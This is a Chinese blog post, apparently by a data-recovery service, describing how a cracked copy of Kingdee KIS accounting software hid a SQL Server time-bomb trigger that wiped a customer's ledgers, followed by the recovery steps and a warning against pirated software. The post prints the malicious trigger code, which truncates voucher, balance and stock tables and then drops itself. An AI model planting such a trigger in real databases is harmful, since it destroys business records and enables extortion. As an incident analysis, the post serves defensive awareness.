金蝶KIS专业版替换allinone和sxs.dll补丁（遭后门清空或破坏数据被修改为“恢复数据请联系”）

[全站通告] 想快速节省您的时间并可接受付费的朋友，可扫右边二维码加博主微信-非诚勿扰！

近日在百度搜索来的一个客户，描述了一下自己用的金蝶KIS 12.2/12.3 专业版，网上下载的盗版，本想着用几年后就买正版或者找一个靠谱的版本使用，发现并无大碍，一直用到了2021年，用了近6年，2021年底早上进公司发现数据全部被篡改，如下图

数据恢复故障描述

看了一下客户的财务电脑，是XP的系统，果然很老了，被盗版补丁留下的后门入侵修改了所有数据，删除了所有备份！ 毕竟做了这么多年的账，突然要付之东流，很是费解；

使用破解版财务软件，破解者破解后内藏了后门，清空所有数据的触发器。用了几年时间后，后门触发器被激活，删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目等，这样才可以所要更多的金额，说明做这漏洞的人，心机很重；

【临时处理方法】

此时建议立即停止SQL服务，分离数据库源文件，复制拷贝备份处理！切勿重装金蝶软件，切勿重装SQLserver！！如还原其他备份，需事先拷贝 事故后第一手文件，进行备份。不要用账套管理器进行备份，那样是没用的哦；

【数据恢复过程】

接到电话后，客户发来遭后门修改数据库文件，立即组织对数据库分析工作，发现数据库内有一个后门触发器 t_log_autoNumbe ，大致代码内容为：

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry  --删除总账凭证
TRUNCATE TABLE t_balance --删除科目余额表
if @FVersion=‘8.0‘  --版本大于8.0
TRUNCATE TABLE icstockbillEntry --删除存货出入库明细账
else
TRUNCATE TABLE t_cc_stockbillEntry --删除出入库存货明细账
drop trigger t_log_AutoNumber
end
end

GO

1．对故障盘进行全盘镜像，对mdf文件进行备份，防止二次造成破坏。

2．对镜像盘进行扫描重组，对删除的表进行字段分析。

3．对mdf进行底层数据分析，与表结构进行匹配。

4．通过程序的匹配，找到所有删除表的原始ID。

5．通过ID和新表结构，对数据进行提取，生成SQL 脚本。

6．把SQL脚本附加到新的数据库中。

7．把未删除的表的数据进行迁移。

【恢复结果】：发回给客户测试验收，反馈数据基本正确，能恢复这个程度，也实属困难，客户很满意！得到客户的极大好评。

【温馨提示】：使用网上随便下载的破解版软件，危害很大；居心不良的破解者，可能会留下后门木马，删除修改数据，敲诈钱财。如果商用，请使用正版软件；如经济实力不允许，也不要到处下载软件所使用；

PS：好好的软件，为啥免费？还不是为了后期让你缴费，说白了就是让你支付更多的钱财；1、正版 2、找有技术或者技术支持的；

问题未解决？付费解决问题加Q或微信 2589053300 (即Q号又微信号)右上方扫一扫可加博主微信

所写所说，是心之所感，思之所悟，行之所得；文当无敷衍，落笔求简洁。 以所舍，求所获；有所依，方所成！